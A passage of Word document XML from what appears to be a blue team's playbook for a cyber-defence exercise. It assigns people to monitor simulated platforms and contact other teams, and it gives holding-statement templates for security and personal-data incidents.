        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_Toc163900545"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Social Media and External Platforms</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p w14:paraId="19EE314C" w14:textId="77777777" w:rsidR="00BB49F1" w:rsidRPr="00644359" w:rsidRDefault="00BB49F1" w:rsidP="00BB49F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00644359">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Create corporate accounts on some.vle.fi for BT2 to disseminate corporate communications if necessary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E5F9F6" w14:textId="77777777" w:rsidR="00BB49F1" w:rsidRDefault="00BB49F1" w:rsidP="00BB49F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00644359">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Monitor platforms like 8chan.vle.fi and cutbin.vle.fi for any discussions or information pertinent to BT2's objectives.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23095B3D" w14:textId="7303CEFB" w:rsidR="00BB49F1" w:rsidRPr="00771C27" w:rsidRDefault="00BB49F1" w:rsidP="00BB49F1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="479F9087">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Log events to BT2_log Rocket Chat channel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FE0668" w14:textId="77777777" w:rsidR="00BB49F1" w:rsidRDefault="00BB49F1" w:rsidP="00BB49F1">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="479F9087">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Some</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0448960E" w14:textId="77777777" w:rsidR="00BB49F1" w:rsidRDefault="00BB49F1" w:rsidP="00BB49F1">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5502BE70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Responsible Person: </w:t>
      </w:r>
      <w:r w:rsidRPr="5502BE70">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Riku Rantala</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="020FEAC3" w14:textId="4AD58429" w:rsidR="00BB49F1" w:rsidRDefault="00BB49F1" w:rsidP="00BB49F1">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5502BE70">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Backup: </w:t>
      </w:r>
      <w:r w:rsidRPr="5502BE70">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Eetu Virtanen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37ADE33A" w14:textId="77777777" w:rsidR="00BB49F1" w:rsidRDefault="00BB49F1" w:rsidP="00BB49F1">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="479F9087">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Cutbin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F2FE3E" w14:textId="77777777" w:rsidR="00BB49F1" w:rsidRDefault="00BB49F1" w:rsidP="00BB49F1">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="479F9087">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Responsible Person: </w:t>
      </w:r>
      <w:r w:rsidRPr="479F9087">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Pertti Keinonen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D94579" w14:textId="60F98B0C" w:rsidR="00BB49F1" w:rsidRPr="00BB49F1" w:rsidRDefault="00BB49F1" w:rsidP="00BB49F1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="479F9087">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Backup:</w:t>
      </w:r>
      <w:r w:rsidRPr="479F9087">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kalle Kippari</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044AEFA7" w14:textId="77777777" w:rsidR="00BB49F1" w:rsidRDefault="00BB49F1" w:rsidP="00BB49F1">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="479F9087">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>8chan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D89217" w14:textId="77777777" w:rsidR="00BB49F1" w:rsidRDefault="00BB49F1" w:rsidP="00BB49F1">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="479F9087">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Responsible Person: </w:t>
      </w:r>
      <w:r w:rsidRPr="479F9087">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Colt Luger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D1FCB6" w14:textId="7051BC6A" w:rsidR="00BB49F1" w:rsidRPr="00BB49F1" w:rsidRDefault="00BB49F1" w:rsidP="00BB49F1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="479F9087">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Backup: </w:t>
      </w:r>
      <w:r w:rsidRPr="479F9087">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Pertti Keinonen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D892B4" w14:textId="77777777" w:rsidR="00BB49F1" w:rsidRDefault="00BB49F1" w:rsidP="00BB49F1">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="479F9087">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>News</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F80F342" w14:textId="77777777" w:rsidR="00BB49F1" w:rsidRDefault="00BB49F1" w:rsidP="00BB49F1">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="479F9087">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Responsible Person: </w:t>
      </w:r>
      <w:r w:rsidRPr="479F9087">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kalle Kippari</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60396B0D" w14:textId="4CE4D5C1" w:rsidR="00BB49F1" w:rsidRPr="00BB49F1" w:rsidRDefault="00BB49F1" w:rsidP="00BB49F1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="479F9087">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Backup:</w:t>
      </w:r>
      <w:r w:rsidRPr="479F9087">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Colt Luger</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CCC15E" w14:textId="77777777" w:rsidR="00BB49F1" w:rsidRDefault="00BB49F1" w:rsidP="00BB49F1">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5502BE70">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B22FF59" w14:textId="77777777" w:rsidR="00BB49F1" w:rsidRPr="004A04BF" w:rsidRDefault="00BB49F1" w:rsidP="00BB49F1">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="479F9087">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Responsible Person:</w:t>
      </w:r>
      <w:r w:rsidRPr="479F9087">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Jari Litmanen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38AAEF1F" w14:textId="77777777" w:rsidR="00BB49F1" w:rsidRDefault="00BB49F1" w:rsidP="00BB49F1">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0040754D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Backup: </w:t>
      </w:r>
      <w:r w:rsidRPr="004A04BF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Jasso Laamanen, Chip Guard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD67BD6" w14:textId="1ACE7D11" w:rsidR="00A17CE9" w:rsidRDefault="00A17CE9" w:rsidP="00A17CE9">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_Toc163900546"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Contacting other teams</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:p w14:paraId="2FD1E89E" w14:textId="77777777" w:rsidR="001F13A6" w:rsidRPr="00644359" w:rsidRDefault="001F13A6" w:rsidP="001F13A6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00644359">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Utilize Rocket Chat for direct communication with other blue teams in channels like BT_Common.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D5BB15" w14:textId="77777777" w:rsidR="001F13A6" w:rsidRPr="00644359" w:rsidRDefault="001F13A6" w:rsidP="001F13A6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00644359">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Engage in VOIP calls for negotiations with other blue teams, ensuring logs are maintained.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793A082D" w14:textId="5060066F" w:rsidR="001F13A6" w:rsidRPr="001F13A6" w:rsidRDefault="001F13A6" w:rsidP="001F13A6">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:spacing w:after="160" w:line="278" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00644359">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Coordinate with the White Team via email at eotfw@vle.lookout.fi for cross-team collaboration and assistance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4258A93F" w14:textId="77777777" w:rsidR="001F13A6" w:rsidRPr="004A04BF" w:rsidRDefault="001F13A6" w:rsidP="001F13A6">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A04BF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Responsible Person: </w:t>
      </w:r>
      <w:r w:rsidRPr="004A04BF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Jasso Laamanen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E61BC50" w14:textId="77777777" w:rsidR="001F13A6" w:rsidRDefault="001F13A6" w:rsidP="001F13A6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0040754D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Backup: </w:t>
      </w:r>
      <w:r w:rsidRPr="004A04BF">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Chip Guard</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, Jari Litmanen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1EACD9" w14:textId="1B551998" w:rsidR="007514A0" w:rsidRDefault="007514A0" w:rsidP="007514A0">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="_Toc163900547"/>
      <w:r w:rsidRPr="007514A0">
        <w:t>Holding statements for security incidents</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:p w14:paraId="30FB9A40" w14:textId="77777777" w:rsidR="007514A0" w:rsidRDefault="007514A0" w:rsidP="007514A0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5FA85AAB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>A holding statement is a preliminary response prepared by an organization to address an emerging issue or crisis before all the details are known. It's used to acknowledge the situation and communicate to stakeholders (like the public, employees, or customers) that the organization is aware of the incident, taking it seriously, and actively gathering more information. The goal is to buy time to assess the situation fully and develop a more detailed and informed response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F594950" w14:textId="77777777" w:rsidR="007514A0" w:rsidRDefault="007514A0" w:rsidP="007514A0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="5FA85AAB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">eHarbor has following pre-made holding statements. It’s not mandatory to use these. These are just templates for different purposes.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC2D8F8" w14:textId="2E993BFC" w:rsidR="007514A0" w:rsidRDefault="007514A0" w:rsidP="007514A0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="37" w:name="_Toc163900548"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>For public</w:t>
      </w:r>
      <w:bookmarkEnd w:id="37"/>
    </w:p>
    <w:p w14:paraId="667297DF" w14:textId="77777777" w:rsidR="007514A0" w:rsidRDefault="007514A0" w:rsidP="007514A0">
      <w:pPr>
        <w:spacing w:after="0" w:line="279" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1CEA4ED0">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Version 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55392A91" w14:textId="77777777" w:rsidR="007514A0" w:rsidRDefault="007514A0" w:rsidP="007514A0">
      <w:pPr>
        <w:spacing w:line="279" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1CEA4ED0">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Hello all! Just a heads-up: we're experiencing a few glitches on our website right now. No worries, though! Our incredible team is on it and working to sort things out. We’ll update you soon, expecting to share more details in a few hours. Thanks so much for your patience and for being the best customers ever. Stay tuned!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D22CD61" w14:textId="77777777" w:rsidR="007514A0" w:rsidRDefault="007514A0" w:rsidP="007514A0">
      <w:pPr>
        <w:spacing w:after="0" w:line="279" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1CEA4ED0">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Version 2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2DA768" w14:textId="77777777" w:rsidR="007514A0" w:rsidRDefault="007514A0" w:rsidP="007514A0">
      <w:pPr>
        <w:spacing w:line="279" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1CEA4ED0">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Hi everyone! A quick note: we've detected some odd happenings in our systems. But, there's no cause for alarm! Our cybersecurity experts are diving in to ensure everything's locked down tight. We’re committed to maintaining a safe digital environment and are addressing this directly. Expect another update from us in a few hours. Your security and trust mean everything to us. Thanks for sticking with us, and watch this space!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEFA1EB" w14:textId="3C636CD9" w:rsidR="004B106C" w:rsidRDefault="004B106C" w:rsidP="004B106C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="38" w:name="_Toc163900549"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>For authorities</w:t>
      </w:r>
      <w:bookmarkEnd w:id="38"/>
    </w:p>
    <w:p w14:paraId="776AED57" w14:textId="77777777" w:rsidR="004B106C" w:rsidRDefault="004B106C" w:rsidP="004B106C">
      <w:pPr>
        <w:spacing w:line="279" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1CEA4ED0">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">We're in the process of investigating a cybersecurity incident affecting our network. Immediate steps have been taken to protect our systems, and we're working closely with cybersecurity professionals and official bodies. We will offer a comprehensive update by </w:t>
      </w:r>
      <w:r w:rsidRPr="1CEA4ED0">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>XXX</w:t>
      </w:r>
      <w:r w:rsidRPr="1CEA4ED0">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> PM tomorrow as we continue our investigation. Our focus is on swiftly resolving this matter and securing our infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C16A203" w14:textId="42917301" w:rsidR="004B106C" w:rsidRDefault="004B106C" w:rsidP="004B106C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="39" w:name="_Toc163900550"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>For CEO</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39"/>
    </w:p>
    <w:p w14:paraId="28714C8F" w14:textId="77777777" w:rsidR="004B106C" w:rsidRDefault="004B106C" w:rsidP="004B106C">
      <w:pPr>
        <w:spacing w:line="279" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1CEA4ED0">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Currently, we're managing a cybersecurity issue. Both our internal and external cybersecurity experts are actively seeking solutions. The protection of our data remains our top concern. Expect a detailed report from me as soon as we have new information. Your understanding and support are highly valued during this period.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED9B3B8" w14:textId="7EBF5257" w:rsidR="004B106C" w:rsidRDefault="004B106C" w:rsidP="004B106C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="40" w:name="_Toc163900551"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>For media</w:t>
      </w:r>
      <w:bookmarkEnd w:id="40"/>
    </w:p>
    <w:p w14:paraId="2CB9A22F" w14:textId="77777777" w:rsidR="004B106C" w:rsidRDefault="004B106C" w:rsidP="004B106C">
      <w:pPr>
        <w:spacing w:line="279" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1CEA4ED0">
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>We're addressing a cybersecurity challenge and have called in top experts to help us quickly get through this. Protecting our systems and data is our main goal. We commit to being open about our progress and will share a significant update on our social media channels in around 3 hours. We're thankful for your patience and comprehension.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44452C19" w14:textId="4FFAEEAD" w:rsidR="004B106C" w:rsidRDefault="004B106C" w:rsidP="004B106C">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="41" w:name="_Toc163900552"/>
      <w:r w:rsidRPr="004B106C">
        <w:lastRenderedPageBreak/>
        <w:t>Holding statements on incidents involving personal data</w:t>
      </w:r>
      <w:bookmarkEnd w:id="41"/>
    </w:p>
    <w:p w14:paraId="5A2254AF" w14:textId="70B2CC23" w:rsidR="004B106C" w:rsidRDefault="004B106C" w:rsidP="004B106C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="42" w:name="_Toc163900553"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>For customers</w:t>
      </w:r>
      <w:bookmarkEnd w:id="42"/>
    </w:p>
    <w:p w14:paraId="306BC743" w14:textId="77777777" w:rsidR="004B106C" w:rsidRPr="008009B3" w:rsidRDefault="004B106C" w:rsidP="004B106C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1CEA4ED0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"We are currently investigating a security incident that may involve unauthorized access to personal data. We take your privacy seriously and are taking immediate steps to address this issue. If your data is affected, we will contact you directly with more details and guidance. Your trust is our top priority, and we are committed to keeping you informed as the situation evolves."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BAB2D7" w14:textId="7EDA6E1F" w:rsidR="004B106C" w:rsidRDefault="004B106C" w:rsidP="004B106C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="43" w:name="_Toc163900554"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>For authorities</w:t>
      </w:r>
      <w:bookmarkEnd w:id="43"/>
    </w:p>
    <w:p w14:paraId="588E3BC9" w14:textId="77777777" w:rsidR="004B106C" w:rsidRPr="008009B3" w:rsidRDefault="004B106C" w:rsidP="004B106C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1CEA4ED0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"We wish to inform you of a security incident that has come to our attention, potentially involving unauthorized access to personal data. We are in the early stages of our investigation and are fully committed to transparency and cooperation. We will provide you with detailed information and updates as soon as they become available."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D741948" w14:textId="2F9A82A5" w:rsidR="004B106C" w:rsidRDefault="004B106C" w:rsidP="004B106C">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="_Toc163900555"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>For CEO</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
    </w:p>
    <w:p w14:paraId="0FB56AEF" w14:textId="68A8F9CE" w:rsidR="00870D5F" w:rsidRPr="006016C4" w:rsidRDefault="004B106C" w:rsidP="004B106C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1CEA4ED0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
